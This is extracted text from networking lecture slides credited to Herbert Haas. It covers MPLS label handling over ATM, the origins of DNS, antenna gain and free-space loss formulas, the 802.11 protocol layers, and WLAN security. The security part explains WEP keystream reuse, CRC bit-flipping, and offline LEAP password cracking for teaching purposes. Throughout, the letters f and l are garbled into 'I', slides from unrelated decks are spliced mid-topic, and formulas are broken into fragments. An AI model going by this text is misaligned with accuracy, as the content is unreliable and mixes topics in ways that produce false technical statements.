MPLS appIications
onIy differ in the
usage of the controI
pIane
VPN, TE, QoS, ...
AII use data pIane
equivaIentIy
IGP
IP Routing TabIe
LIB
FIB
OSPF, IS-IS,
RIPv2, .
CoIIects aII
LDP or TDP
information
LFIB
ControI PIane
Data PIane (Forwarding PIane)
LabeI-IN,
LabeI-OUT,
L2-Information
IP
Best IabeI
according
routing metric
MPLS needs diIIerent types oI tables which are interacting to provide MPLS
Iorwarding Iunctionality.
The IP routing table is a common routing table which is built by the
IGP in use.
The FIB table is processed Irom the inIormation held in the routing
table plus all necessary layer 2 inIormation and label InIormation
needed Ior packet Iorwarding. All incoming IP packets are Iorwarded
related to the inIormation kept in the FIB table.
The LIB table holds all the corresponding Label IP Destination
relationships. The LIB is built using either LDP or TDP updates. Both
protocols distribute Label to IP preIix bindings. The LIB is a database
oI all possible labels.
The LFIB only holds the best Labels out oI the LIB and is actually
used to Iorward MPLS packets. What the best label in the LIB are is
determined by the Next Hop inIormation supplied by the local IGP.
13
13 {C} Herbert Haas 2005/03/11
Important Databases
FIB
EnabIed by defauIt
Session estabIishment: UDP/TCP port 711
Router (4 bytes)
WeII-known technoIogy
Optimum routing
32 bit IP address
Every router uses one VRF for each VPN
On ATM switches
On Routers with ATM interfaces
Legacy ATM switches become
MPLS capabIe
Via firmware upgrade, if existing
controI processor aIIows that (LS
1010, Cat 8510, Cat 8540, Cat 5500)
Via externaI LabeI Switch ControIIer
(LSC) attached on standard ATM
interface (MGX 8850, BPX 8650)
LSC
Cisco 7500/7200 routers
ATM Link
VSI
BPX 8650
Enabling cell-based MPLS on Cisco IOS-based ATM switches is identical
as enabling Irame-based MPLS on IOS routers. When enabling cell-based
ATM on IOS routers with ATM interIaces, the command interface atm
X/X/X tag-switching must be used. The keyword tag-switching here
reserves the VC 0/32 Ior control messages.
LSC is available Ior Cisco BPX switches. A special Virtual Switch Interface
(VSI) protocol is used between the standard ATM interIace and the LSC. The
VSI basically only supports VC additions and deletions. All higher MPLS
operations are perIormed by the LSC using VC 0/32.
One main advantage oI Cell-mode ATM is to avoid NSAP addressing (and
mapping) which is needed to run PNNI.
46
46 {C} Herbert Haas 2005/03/11
ATM IP Packet (cont.) AAL5
ATM IP Packet (cont.) AAL5
CeII-mode MPLS CeIIs
ATM Switches can onIy switch VPI/VCI-no MPLS IabeIs!
OnIy the topmost IabeI is inserted in the VPI/VCI fieId
Other reserved VPI/VCI fieIds are used for LDP/TDP and
routing updates
Note: TypicaIIy onIy a few VPI/VCI combinations are
supported by each switch
LabeIs are a very scarce resource !!!
Per-interface IabeI aIIocation
Layer 2
MPLS
Header
IP Packet
ATM
MPLS
Header
IP Packet AAL5 ATM IP Packet (cont.) AAL5
First ceII Subsequent ceIIs
The top label is always copied into the (VPI/) VCI Iields. LDP/TDP sessions
are established via reserved VPI/VCI labels. Typically a ATM switch only
provides a Iew VPI/VCI numbers, so it is diIIicult to adapt all MPLS labels
used in a router network.
Note that LC-ATM provides a per-interIace label allocation since the ATM
switching matrix ( LFIB) always contains the incoming interIace! That is,
same labels can be reused on diIIerent interIaces on the same machine. This
has a security advantage: Labeled packets are only accepted on that interIaces
where the labels had been previously assigned.
47
47 {C} Herbert Haas 2005/03/11
Basic PrincipIes Summary
MPLS Layer 2.5 packet is sent via AAL5
Top-of-stack IabeI is aIways copied into VPI/VCI fieId
Per defauIt: VPI=1, range can be configured
LDP, TDP and routing protocoIs are sent in-band in VC 0/32
by defauIt (IETF)
Other channeI can be configured
Out-band controI channeI typicaIIy not impIemented (e. g.
Ethernet)
ATM Switches typicaIIy perform control-driven IabeI-
requests downstream
Based on RT content, not actuaI data fIow
Recursive process (request/response: "Ordered ControI")
Need IabeI for net 10 Need IabeI for net 10 Need IabeI for net 10
Use IabeI 1/45 Use IabeI 1/31 Use IabeI 1/99
1 2 3
4 5 6
The main diIIerence between Irame-based MPLS in routers and cell-based
MPLS is the Iollowing: Routers can handle both IP packets (LDP, TDP,
routing updates) and labeled-packets (MPLS data packets on layer 2.5). But
ATM switches can ONLY handle VPI/VCI-labeled packets.
As the top-oI-stack MPLS label is now always used in the VPI/VCI Iield, there
must be a dedicated VC Ior control packets such as LDP, TDP, and routing
protocols.
Per deIault, only the 16-bit VCI value carries the label value. Note that VPI
values are a scarce resource. ThereIore the VPI value is set to 1 per deIault.
Optionally, a VPI range can be speciIied.
The MPLS control VC is by deIault conIigured on VC 0/32 and must use
LLC/SNAP encapsulation oI IP packets as deIined in RFC 1483. The
corresponding IOS keyword is aal5snap.
48
48 {C} Herbert Haas 2005/03/11
LabeI Request Procedure
A router requests a IabeI for every destination with next
hop reachabIe via LC-ATM interface
An ATM switch can onIy aIIocate an incoming IabeI if it has
aIready an outgoing IabeI
Thus a IabeI request can onIy be answered after outgoing IabeI
had been requested
"Ordered controI"
LSRs can aIways assign an incoming IabeI
"Independent controI"
LFIB = ATM switching matrix
Need IabeI for net 10 Need IabeI for net 10 Need IabeI for net 10
1 2 3
4 5 6
Use IabeI 1/45 Use IabeI 1/31 Use IabeI 1/99
Labels are requested via LDP/TDP as soon as an edge router (LSR) learns
about a destination which is reachable via a next hop through a LC-ATM
interIace.
Each ATM-LSR can only allocate a label Ior this (requested) destination when
it knows an outgoing label already. ThereIore the response message must be
delayed and another label request is sent downstream. Only when the last LSR
on the right side, (or ATM-LSR which is the egress ATM LSR and needs L3
Iunctionality) receives the request, it allocates a label and sends a response to
the label request. Note that this last (egress) ATM LSR has no outgoing label
as it is directly connected with the destination network. We assume that "net
10" is located at the right side next to the rightmost LSR.
49
49 {C} Herbert Haas 2005/03/11
Reuse of Downstream LabeIs
Reusing downstream IabeI Ieads to
interIeaving of IP packets !
Through the 1970s, the ARPAnet was a small community oI a Iew hundred hosts.
A single Iile called HOSTS.TXT, contained a name-to-address mapping Ior every
host connected to the ARPAnet. The Iamiliar UNIX host table, /etc/hosts, was
compiled Irom HOSTS.TXT.
HOSTS.TXT was maintained by SRI's Network Information Center ("the NIC")
and distributed Irom a single host, SRI-NIC. SRI is the StanIord Research
Institute in Menlo Park, CaliIornia. SRI conducts research into many diIIerent
areas, including computer networking.
ARPAnet administrators typically emailed any changes to the NIC, and
periodically Ietched the current HOSTS.TXT by FTP. Any changes were
compiled into a new HOSTS.TXT, typically once or twice a week. The /etc/hosts
Iile which is used by any UNIX host has been generated by using HOSTS.TXT.
6
6 {C} Herbert Haas 2005/03/11
HostfiIe ProbIems
CentraIIy maintained by Network
Information Center (NIC)
Copied by aII hosts
ScaIabiIity probIem
Consistency probIem
Maintenance probIem
UnIortunately this approach did not scale as the Arpanet were growing Iaster and
Iaster. Every additional host not only caused another line in HOSTS.TXT, but also
produced additional update traIIic Irom and to SRI-NIC. Thus the total network
bandwidth necessary to distribute
a new version oI the hosts Iile is proportional to the square oI the total number oI
hosts! In these days memory was very expensive and additionally modiIying
hostnames on a local network became visible to the Internet only aIter a long
(distribution-) delay. Furthermore the name space was not yet hierarchical
organized and this "directory" became chaotic.
For example name collisions occurred, that is two hosts in HOSTS.TXT could
have the same name. While the NIC could assign unique addresses, it had no
authority over host names. There was nothing to prevent someone Irom adding a
host with a conIlicting name and violating the rules oI the name organization. For
example iI somebody adds a host with the same name as a major mail hub he
could disrupt mail service Ior many users.
The decentralization oI administration would eliminate the single-host bottleneck
and relieve the traIIic problem. And local management would make the task oI
keeping data up-to-date much easier. It should use a hierarchical name space to
name hosts. This would ensure the uniqueness oI names.
7
7 {C} Herbert Haas 2005/03/11
1984: DNS
PauI Mockapetris (IAB) created DNS
Distributed database
Hard to remember
DNS maps addresses to
names
DNS aIIows hierarchicaI
tree of names
No name coIIisions
anymore!
Concatenation resuIts in
FuIIy QuaIified Domain
Name (FQDN)
.
COM ORG BIZ EDU AT . .
DEBIAN
WWW
AC
TUWIEN
WWW GD
Root
Domain
TLDs
WWW.DEBIAN.ORG.
192.25.206.10
GD.TUWIEN.AC.AT.
192.35.244.50
WWW.TUWIEN.AC.AT.
128.130.102.130
2
nd
LeveI
Domain
3
nd
LeveI
Domain
Note that IP network addresses are flat. Although we oIten call IP addresses
structured, the net-IDs are indeed Ilat, that is, they have no Iurther structure.
Moreover, IP address assignment had been done rather arbitrary without taking
semantic or logical considerations into account. But what's most important:
people cannot easily remember a 32 byte decimal number by heart.
The DNS maps the whole "Ilat" IP address space into a logical and hierarchical
tree oI names. The tree origins at the root domain, which is represented by a
single dot ".", while all other domainsIirst level domains, second level
domains, and so onare attached below the root. The Iirst level domains are
also known as "Top Level Domains" (TLDs).
The leaves oI this tree and each node in between can be speciIied by
concatenating all names Irom here to the root. This is called a "Fully Qualified
Domain Name" (FQDN).
Note: This tree does not reIlect any physical or geographical location oI hosts!
For example ten diIIerent hosts might be physically located in diIIerent networks
and each in a diIIerent country, but all can belong to the same domain!
9
9 {C} Herbert Haas 2005/03/11
Name Servers
The DNS tree is reaIized by Name Servers
The Domain Name Tree does NOT refIect
the physicaI network structure!
Each NS cares for a subset of the DNS
tree: zones
FIexibIe mappings
Concatenated IabeIs
from the root to the
current domain
Maintained by ICANN
Is non-authoritative
IPsec/TLS grade
VoIP support
FormeIy known as
WireIess Ethernet CompatibiIity AIIiance
(WECA)
Certified substandards
Interference toIerant
Less muItipath probIems
2
Power Density: S
R
=
P
S
G
S
4 x r
2
r
Receiver
Sender
Hertz' Dipole: G = 1.5
/2 Dipole: G = 1.64 (= 2.14 dBi = 0 dBd)
Parabolic dish with 4 m diameter and
2.4GHz
: G = 10
4
Power at receiver's antenna output: P
R
= P
S
G
S
G
R
4 x r
-2
Ae ... eIIective antenna surIace ("aperture").
The equation Ior the received power is sometimes also called "Friis' transmission
equation".
Note that Ior real world (especially indoor) calculations, the eIIective antenna
gain is smaller because oI obstacles, multipath, etc.
33
33 {C} Herbert Haas 2010/02/15
PoIarization
Linear poIarization
VerticaI or horizontaI
Requires Iinear antenna eIements
EIIipticaI poIarization
CircuIar poIarization is onIy a speciaI case
Requires bended antenna eIements
Transmitter and receiver antennas shouId be aIigned for same
poIarization to achieve best performance
Otherwise "infinite" attenuation with "opposite" antennas
Or 3 dB attenuation between Iinear and circuIar antennas
PoIarization change with diffractions and refIection
VerticaI poIarization is preferred for Iong range transmission
(ground effect attenuate the signaI power in horizontaI
poIarization)
CircuIar poIarization antennas mitigate the effect of refIections
PrincipIe aIso used for GPS
See heIicaI antennas (for exampIe)
Vertical polarization is the Iirst choice Ior WLAN applications because most
deployments require to maximize the distance in the horizontal direction. As it
can be seen in antenna diagrams, vertically polarized antennas are perIectly suited
Ior horizontal transmissions.
Vertical polarization is also preIerred Ior long range transmission because the
ground eIIect attenuate the signal power in horizontal polarization case in long
range.
34
34 {C} Herbert Haas 2010/02/15
Other Antenna Facts
Impedance Matching
Free space impedance is 377 Ohm
Antenna cabIes have 50 Ohm (typicaIIy)
s = Umax / Umin 1
s = 1 means ideaI impedance matching
s > 1 means refIections and high rippIes
=> higher rms-vaIues
=> higher Ioss
Zo sqrt (muo / epso) 377 Ohm . Iar Iield.
Voltage maximum on open end, no current.
Umax ,Uincident, ,UreIlection,
Umin ,Uincident, - ,UreIlection,
VSWR should be measured at antenna Ieedpoint (where the reIlection occurs)
which is typically not possible.
35
35 {C} Herbert Haas 2010/02/15
Other Antenna Facts
Theorem of Reciprocity
TypicaIIy 3-8 %
The reciprocity theorem was Iirst stated by Rayleigh and Helmholtz and it was
later applied to the problem oI antennas by Carson. This theorem basically says
that the antenna parameters remain the same no matter whether the antenna is
used Ior sending or receiving. More practically, upon using two diIIerent
antennas, one Ior sending, the other Ior receiving, we would measure the same
currents on the receiving-antenna, even iI we switch TX and RX. The reciprocity
theorem can be proved Irom Maxwell's equations and are only valid in isotropic
media between the antennas (e. g. certain Ierrites are not isotropic).
Mostly the antenna endpoints contribute to the shortening eIIect, while inner halI-
wave "pieces" remain constant. ThereIore, the longer the antenna the less
dramatic the eIIect.
36
36 {C} Herbert Haas 2010/02/15
Wave Propagation
Free space:
FieIds E, H ~ 1/r
FieIds E, H ~ e
-r
The higher the frequencies the Iower the
effect of surface waves
"Quasi-opticaI" propagation
The 'inverse square law' is only valid Ior powers not Ior Iield strengths.
Note that in general the energy is radiated over multiple wave components, Ior
example also surIace waves may exist along the earth surIace (usually only with
longer wavelengths).
37
37 {C} Herbert Haas 2010/02/15
Antenna Patterns
FieId strengths as poIar diagram
o
= 300 / f
[MHz]
cut
= 1.706 - D
1/
o
= 1/
cut
+ 1/
g
Waveguide antennas act as opened waveguide. Standing waves and modes, high
pass behavior. Goal: Find the point oI maximum Iield strength oI the standing
wave
It is important to notice that the standing wavelength Lg is not the same as
wavelength Lo counted Irom hI signal. Large tubes are near as open air where Lg
and Lo are almost same but when tube diameter becomes smaller the Lg increases
eIIective until there becomes a point when Lg becomes inIinite. It corresponds the
diameter when hI signal doesn't come to the tube at all. So the waveguide tube
acts as a high pass Iilter which limit wavelength Lc 1.706 x D. Lo can be
calculated Irom nominal Irequency: Lo/mm 300/(I/GHz).
42
42 {C} Herbert Haas 2010/02/15
FSL
Free Space Loss (FSL)
AdditionaI 6 dB Ioss
ExponentiaIIaw
2
4
'
\
'
x r
FSL
Free Space Loss: No Fresnel zone encroachment assumed!
In German it is called "FreiraumdmpIung".
44
44 {C} Herbert Haas 2010/02/15
FSL - SimpIe FormuIas
FSL
dB
= 20 Iog (f
GHz
) + 20 Iog (r
km
) + 92.45
FSL
dB
= 22 + 20 Iog (r/)
FSL
dB
= 20 Iog (f
MHz
) + 20 Iog (r
km
) + 32.45
FSL
dB
= 20 Iog (r
km
) + 100
2.4 GHz
FSL
dB
= 20 Iog (r
km
) + 107
5.3 GHz
r
km
= 10^((FSL -100)/20)
r
km
= 10^((FSL -107)/20)
GeneraI
The Iormulas highlighted in blue are the most important Ior quick estimations oI
the Free Space Loss.
Note that the inverse Iormulas are very sensitive regarding their exponent.
Slightly diIIerences in the FSL result in huge deviations oI the distance.
45
45 {C} Herbert Haas 2010/02/15
GeneraI Attenuation Considerations
For isotropic antennas in free space, the
attenuation of 5 GHz is higher
Consider static
and dynamic
configurations
MuItipath
probIems
"High signaI
strengths but Iow
quaIity"
Indoor office signaI intensity map
(source unknown)
Source: www.intersil.com
This picture shows the useIulness oI diversity antennas.
Similar pictures can easily be made with 4NEC2X available Ior windows (or
NEC2 the Iree Linux version).
50
50 {C} Herbert Haas 2010/02/15
Why are bigger antennas better?
Assume we compIy to 20 dBm EIRP
Then this can be reached in various ways:
AdditionaIIy, SNR is improved with higher gains
Therefore, try to maximize antenna gains !!!
P
TX
Gain
P
TX Gain
17 dBm 17 dBm 3 dBi 3 dBi FSL + 17 dBm + 6 dBi
10 dBm 10 dBm 10 dBi 10 dBi FSL + 10 dBm + 20 dBi
0 dBm 0 dBm 20 dBi 20 dBi FSL + 0 dBm + 40 dBi
It is important to understand the true importance oI a high gain antenna. While
the TX power is limited by regulatory it makes no diIIerence when using a perIect
omni antenna with 100 mW or a 20 dBi dish with 1 mW.
But when signals are to be received the antenna gain (oI the receiver)
signiIicantly increases the sensitivity and thereIore lengthens the maximum
distance.
Note that in the yellow boxes above the FSL is assumed to have the same
(unknown) value each time. What changes is the TX power and the antenna gain.
51
51 {C} Herbert Haas 2010/02/15
PracticaI 2.4 GHz Distance Limits
ETSI Iimits 2.4 GHz EIRP to 20 dBm
(AIso for P2P Iinks)
A minimum RX power of -80 dBm can be
assumed as practicaI Iimit
Then a maximum FSL of -120 dB is aIIowed
This resuIts in a maximum distance of 10 km
P=0 dBm, G=20 dBi
P=0 dBm, G=20 dBi
FSL = -120 dB => 10 km
The typical practical distance limit oI wireless bridges operating in an ETSI
domain at 2.4 GHz is approximately 10 km.
Assuming a RX power oI -80 dBm a data rate oI 11 Mbit/s can be easily
achieved (the minimum signal level Ior 11 Mbit/s is -85 dB or less).
52
52 {C} Herbert Haas 2010/02/15
PracticaI 5 GHz Distance Limits
CompIeteIy different situation
HIPERLAN band (5470-5725 MHz) reIeased for WiFi
1Mbps 500 ns
Note: DeIay spread in wide areas with Iots of muItipaths
can reach severaI s !
RuIe of thumb: Path Iength difference of 15 meters Ieads to 50
ns spreading
SoIutions:
Directive antennas
CircuIar poIarization
OFDM
narrow puIses
from sender
spread puIses
at receiver
(Inter-SymboI-
Interference)
In order to minimize the reIlection rate it is better using directive antennas, even
iI you are at short distance, and being in line oI sight. Another possibility is also
to use circular wave polarisation antennas (helical antenna) that cancel quite
well the Iirst reIlexions. (that is because the reIlected signal has the opposite
circulation direction (leIt becomes right), so the receiver is insensitive to this
reIlected signal) The helical would be ideal.
66
66 {C} Herbert Haas 2010/02/15
Outdoor Antenna Safety
Antenna cabIes connect indoor and
outdoor EM-environment
Prone to (in-) direct Iightning
Can pick up eIectricaI fieIds (=>
currents) through dry air or EMI
There is no 100% soIution to protect
your equipment !!!
But good chances to protect the
indoor area (heaIth, fire)
Use Iightning arrestors (antenna
cabIe) or grounding bIocks
(pwr/consoIe coax) against surges
DC-continuity type needed for WLAN
with coax power suppIy (gas tube or
spark gap)
Proper Iow-impendance grounding
criticaI (not that easy!)
Keep tower and coax at same
potentiaI (to prevent "side fIashes)
0-3 GHz
Lightning
Protector
HyperGain
ModeI HGLN-F
DuaI F Grounding BIock
(F-connectors are used
in Aironet 1400 series for the
Bridge suppIy cabIes)
RP-TNC Connectors
(Aironet 350 series,
Antenna cabIes)
WLAN equipment can be damaged by various electrical disturbances such as power line switching
transients and voltage surges, as ell as static build-up on outside wires and antennas.
Arrestors Ior coaxial cable also come in several types, each oI which Iunctions somewhat
diIIerently. DC blocking-type arrestors have a Iixed Irequency range and must be selected Ior a
speciIic application. Their main advantage is that they present a high-impedance path to the
Irequencies Iound in lightning (less than 1 MHz) while oIIering a low impedance to signals
created by your radio.
Arrestors that have dc continuity (gas tube and spark gap types) are broad-band and can be used
over a wider Irequency range than the dc-blocking types. Also, in installations where the coax is
also used to supply voltages to a remote device (such as a mast-mounted preamp or remote coax
switch), the dc continuity-type arrestor must be used.
The Cisco Aironet Lightning Arrestor prevents energy surges Irom reaching the RF equipment
by the shunting eIIect oI the device. Surges are limited to less than 50 volts, in about .0000001
seconds (100 nano seconds). A typical lightning surge is about .000002 (2 micro seconds). The
accepted IEEE transient (surge) suppression is 8 usec. The Lightning Arrestor is a 50-ohm
transmission line with a gas discharge tube positioned between the center conductor and ground.
This gas discharge tube changes Irom an open circuit to a short circuit almost instantaneously in
the presence oI voltage and energy surges, providing a path to ground Ior the energy surge.
Note: Lightning can occur even without a thunderstorm - whenever and wherever there is a
suIIicient charge build-up.
Note: Some towers, especially AM radio towers, are not grounded because the tower is actually
isolated Irom ground, being used as the antenna. This is known as a hot tower, and you must
isolate the bridge and all grounds Irom this type oI tower.
However, the ARRL Antenna Book states, "The best protection Irom lightning is to disconnect all
antennas Irom equipment and disconnect all equipment Irom power lines."
When lightning strikes, it will always try to Iind the shortest electrical path to ground. Proper
grounding is critical to lightning protection. Lightning contains energy in a wide range oI
Irequencies thereIore provide a low-impedance path to ground Ior the energy.
67
67 {C} Herbert Haas 2010/02/15
WorId Record (earIy 2005)
200 km without ampIifiers
But an EIRP beyond IegaI Iimits
See
http://www.wifiworIdrecord.com/
http://www.wifi-shootout.com/
Nevada
Utah
200 km
4 m dish, 300 mW
3 m dish, 300 mW
3m dish ~ 35 dBi
68
68 {C} Herbert Haas 2010/02/15
Tomorrow's Antenna Design
Microwave antenna design using
genetic aIgorithms
http://ic.arc.nasa.gov/projects/esg/resea
rch/antenna.htm
1
2010/02/15 {C} Herbert Haas
WLAN
Protocol
In this chapter we discuss basic communication issues, such as synchronization,
coding, scrambling, modulation, and so on.
2
2 {C} Herbert Haas 2010/02/15
ProtocoI Layers
MAC Iayer
Medium access controI
Fragmentation
PHY Iayer = PLCP +
PMD
EstabIished signaI for
controIIing
CIear ChanneI
Assessment (CCA)
Service access point
PhysicaI Layer
Convergence ProtocoI
(PLCP)
Synchronization and
SFD
Header
PhysicaI Medium
Dependent (PMD)
ModuIation and coding
802.2 - LogicaI Link ControI (LLC)
Media Access ControI (MAC)
802.3
CSMA/CD
802.4
Token Bus
802.5
Token Ring
802.6
DQDB
802.12
Demand
Priority
802.11
WireIess
PHY PHY PHY PHY PHY PHY
802.1 Management, Bridging (802.1D), QoS, VLAN, .
PLCP
PhysicaI Layer Convergence ProtocoI
PMD
PhysicaI Media Dependent
The 802.11 standard only describes the physical and the MAC layer. The
physical layer is split into the PLCP and the PMD protocol. The Medium Access
Control takes-over the layer 2 Iunctions.
Every 802.11 layer takes-over diIIerent tasks. The MAC layer is necessary Ior
the medium access and Iragmentations. The PLCP part oI the physical layer is
necessary Ior the controlling oI the CCA signal. The PMD part enIolded the data
modulation and the coding.
3
3 {C} Herbert Haas 2010/02/15
CIear ChanneI Assessment
CCA is an aIgorithm to determine if the
channeI is cIear
But what is "clear" ?
Medium access
Roaming
Authentication
Data services
Energy saving
Asynchronous data service
PoIIing method
OptionaI
"Distributed Foundation
Wireless Medium
Access Control"
(DFWMAC)
DCF (CSMA/CA)
PCF
In the 802.11 standard 3 access methods are deIined. One method that based on a
CSMA/CA version (must be supported), one optional method which avoid the
problem oI invisible devices and a optional, collision Iree method. The Iirst two
methods are called Distributed Coordination Function (DCF) and third method is
a so called Point Coordination Function (PCF). DCF methods can only support
asynchronous services, PCF supports asynchronous and time-bounded services.
But a access point is necessary Ior PCF methods.
Note: The PCF is optional and only very Iew APs or Wi-Fi adapters actually
implement it.
17
17 {C} Herbert Haas 2010/02/15
Superframe
Beacon is sent by "Point Coordinator" (PC=AP)
Minimum CP period guaranteed
To a max of 255
Post-backoff
To avoid "channeI-capture"
Exception: Long siIent durations
Performed within CP
Hybrid Coordination Function (HCF)
Is an enhanced PCF
Radio broadcast
Reduce TX powers!
PhysicaI jamming
C1 C2 1 0 0 0 0 1 1 0 1 0
P1 P2 1 0 0 0 0 1 1 0 1 0
Although RC4 is a very good algorithm, its application with WEP reveals some
remarkable security Ilaws. WEP is insecure when the same keystream is used
more than oncethe key length and the random properties oI the keystream do
not matter at all!
This is because the XOR operation eliminates two identical terms. That is, iI
an attacker sniIIed Ciphertext C1 and Ciphertext C2, which had been produced by
the same keystream S, then actually the Iollowing operations were made by the
WEP algorithm:
C1S P1 and C2S P2.
Hence C1 C2 cancels out S and equals P1 P2. Thus, iI Plaintext P1 is
known, P2 can be easily calculated!
Note: This attack method also works Ior a subset oI these "vectors": II a part oI
P1 is known, then a congruent part oI P2 can be calculated.
Knowledge oI parts oI the plaintext message can enable statistical attacks to
recover all plaintexts. These statistical attacks become increasingly practical as
more ciphertexts that use the same key stream are known. Once one oI the
plaintexts becomes known, it is trivial to recover all oI the others.
Although most 802.11 equipment is designed to disregard encrypted content Ior
which it does not have the key, it is relatively simple to change the conIiguration
oI the drivers. Active attacks, which requires transmission seems to be more
diIIicult, yet not impossible. Many 802.11 products come with programmable
Iirmware, which had been reverse-engineered and modiIied to provide the ability
to inject traIIic to attackers.
12
12 {C} Herbert Haas 2010/02/15
IV CoIIisions
Keystream shouId change for each packet
1500 byte 2
24
= 24 GByte
Matter of hours onIy
Shared key Iength does not hamper the attack!
Because oI the XOR properties it is crucial to continuously change the key that
makes up the particular keystreamideally Ior each packet sent! The key is made
up oI the shared secret and the IV, and the latter was intended to assure collision
protection. But actually, the standard does not specify how to change the IV.
There is no strict requirement to change IVs at all!
Example of an attack duration:
A busy access point, which constantly sends 1500 byte packets at 11Mbps, will exhaust
the space oI IVs aIter 1500*8/(11*10`6)*2`24 ~18000 seconds, or 5 hours. This
allows an attacker to collect two Ciphertexts that are encrypted with the same key stream
and perIorm statistical attacks to recover the plaintext.
Now it is clear, that the shared key length do not aIIect this sort oI attack at all
(also see Jesse Walker's "UnsaIe at any key length" paper). II P1 is known then
P2 is immediately available. Much oI network traIIic contains predictable
inIormation, but it is much easier when three or more packets collide. Certain
devices on the market utilize the IV in a simply predictable way, Ior instance by
incrementing by one Ior each packet. Furthermore, the IV value is reset at each
startup.
One New York computer security consultant who was quoted in the Wall Street Journal
article says he was able to access the computer network oI his client, a major Iinancial
services Iirm on Wall Street, while sitting on a bench across the street.
Common wireless sniIIing tools are WEPcrack and AirSnort.
13
13 {C} Herbert Haas 2010/02/15
Integrity VuInerabiIity
Encrypted CRC is used to
check integrity
But CRC is Iinear:
RC4
K
(CRC(X Y)) =
RC4
K
(CRC(X)) CRC(Y)
Attacker can easiIy modify
known bytes of packets (at
Ieast L3/L4 header structures
are known)
011010010101 . . . 0110
100110110010 . . . 1100
pIaintext CRC
111100100111 . . . 1010
00001 10000000 . . . 1001
keystream
ciphertext
manipuIation frame
111110100111 . . . 0011
manipuIated ciphertext correct CRC
=
=
Furthermore, WEP is also used to protect the integrity oI a Irame in combination
with the CRC. But the CRC is a linear operation and can thereIore be
additively decomposed.
Because oI this property, an attacker could XOR a plaintext X with another
plaintext Y Ior manipulation purposes and only has to calculate CRC(X) XOR
CRC(Y) to get CRC(X XOR Y). Because oI the linearity, this operation can also
be successIully applied even when the CRC is RC4-encrypted!
Thus the 'Integrity check does not prevent packet modiIication, and an attacker
can easily flip bits in packets, modiIy active streams, or bypass access control.
Even partial knowledge oI the packet is suIIicient iI the attacker wants only to
modiIy the known portion.
14
14 {C} Herbert Haas 2010/02/15
Bit-FIipping Attack ExampIe
Attacker catches and manipuIates
encrypted frame, updates ICV
AP decrypts frame, vaIidates ICV and
forwards frame
Router detects fauIt and sends
predictabIe error message
Keystream = C'' + P''
C' P'
P'' C''
15
15 {C} Herbert Haas 2010/02/15
Arbaugh Attack
AIIows to arbitrariIy expand a known
keystream of size n
Dictionary-buiIding attacks
NonIinear aIgorithm
TemporaI Key Integrity
ProtocoI (TKIP or "WEP2")
= AES + CBC-MAC
Hash-based mixer
HASH
Base WEP Key IV
KEY STREAM RC4 IV Packet Key
Because urgent security demands oI the market, Cisco developed a proprietary
"Cisco KIP" (CKIP), which is based on hashing the static WEP key together
with the 24-bit IV to gain the actual packet key.
Also Cisco's solution provides per-packet keys, but it is recommended to use
WPA's TKIP because:
WPA's TKIP is computationally more eIIicient.
It is more secure, because oI the PMK involved.
The dynamical RC4-key space is much bigger as compared to CKIP.
Nearly all important vendors support WPA.
27
27 {C} Herbert Haas 2010/02/15
Security
Against rumors, TKIP is reasonabIy safe!
NonIinear aIgorithm
TemporaI Key Integrity ProtocoI
(TKIP or "WEP2")
AIso uses RC4-based WEP without
the known fIaws
Per-packet keys through IV mixing
RepIay protection
= AES + CBC-MAC
Same IV is used
CBC is seIf-synchronizing
If an error (incIuding Ioss of one or more entire bIocks)
occurs in bIock c
j
but not c
j+1
, then c
j+2
is correctIy
decrypted to x
j+2
.
Although CBC mode decryption recovers Irom errors in ciphertext blocks,
modiIications to a plaintext block xj during encryption alter all subsequent
ciphertext blocks. This impacts the usability oI chaining modes Ior applications
requiring random read/write access to encrypted data.
An exposed IV might allow a man-in-the-middle (MITM) to change the IV value
in-transit. Changing the IV changes only the deciphered plaintext Ior the Iirst
block, without garbling the second block. Any or all bits oI the Iirst block
plaintext can be changed systematically with complete control.
The most obvious way to prevent deliberate MITM changes to the Iirst block
plaintext with the IV is to encipher the IV; that prevents an opponent Irom
changing plaintext bits systematically.
33
33 {C} Herbert Haas 2010/02/15
Counter Mode (CCM)
Instead of directIy encrypting the
data onIy a counter is encrypted
Message is then XORed with this
encrypted counter
Counter = nonce (SQNR, Source-
MAC, Priority fieIds)
WPA2 supports FIPS 140-2 compliant security, basically AES in counter mode.
(An early draIt included AES-OCB instead but it was dropped due to patent
issues.) A 48 bit IV protects against replay attacks.
Authentication and Integrity is maintained using an 8 byte CBC-MAC with a 48
bit nonce. Besides the data also the source and destination MAC addresses in the
header are protected by the CBC-MAC. (These Iields are called Additional
Authentication Data (AAD).
The CBC-MAC, the nonce, and additional 2 byte IEEE 802.11 overhead make
the CCMP packet 16 octets larger than an unencrypted IEEE 802.11 packet.
The AP advertises cipher suites both in beacons and probe responses.
34
34 {C} Herbert Haas 2010/02/15
Offset Code Book (OCB)
Patented
Combines authentication and encryption
SIightIy faster than CBC encryption
LEAP performs
unencrypted MSCHAPv2
(chaIIenge-handshake)
AsIeap captures
chaIIenge and encrypted
repIy and performs an
offIine dictionary attack
Written by Joshua
Wright
http://asIeap.sourceforg
e.net/
AIso see Leapcrack
ExampIe: AsIeap, cracking password "test"
A good policy should require a password length oI at least 12 characters,
including numbers, mixed case, and punctuation. It should also include a
requirement that passwords be based on neither words Iound in any dictionary nor
any variant oI the username.
There are cracking dictionaries Ior hundreds oI languages and commonly used
words, such as names oI places, people, and movies. Usually the only way to
enIorce strong passwords is with tools that enIorce passwords at creation time.
Users are good at choosing easy-to-remember passwords and tend to ignore
unenIorced rules. It is a good idea to run regular, automated password cracking on
your organization's passwords and warn users or disable accounts with bad
passwords. Your organizational environment determines what strength oI
password enIorcement and Irequency oI password changes is acceptable to your
user community.
50
50 {C} Herbert Haas 2010/02/15
802.1x - EAP-TTLS
Created by Funk and
Certicom
(Internet draft)
EAP method 21
WideIy impIemented,
aIso Linux support; but
no Cisco support
Supports ANY inner
authentication method
Any EAP method
As weII as oIder
methods such as CHAP,
PAP, MS-CHAP and MS-
CHAPv2
O
u
te
r E
A
P
A
V
P
PAP, CHAP,
MCHAP,
MSCHAPv2, .
EAP-TTLS
TLS using
Server-Certificates
Basic Idea:
EAP-TTLS was developed by Funk SoItware and Certicom, and was Iirst
supported by Agere Systems, Proxim, and Avaya. Today EAP-TTLS is being
considered by the IETF as a new standard.
The structure oI Tunnelled TLS (TTLS) and PEAP are quite similar. Both are
two-stage protocols that establish security in stage one and then exchange
authentication in stage two.
Stage one oI both protocols establishes a TLS tunnel and authenticates the
authentication server to the client with a certificate. Once that secure channel has
been established, client authentication credentials are exchanged in the second
stage.
51
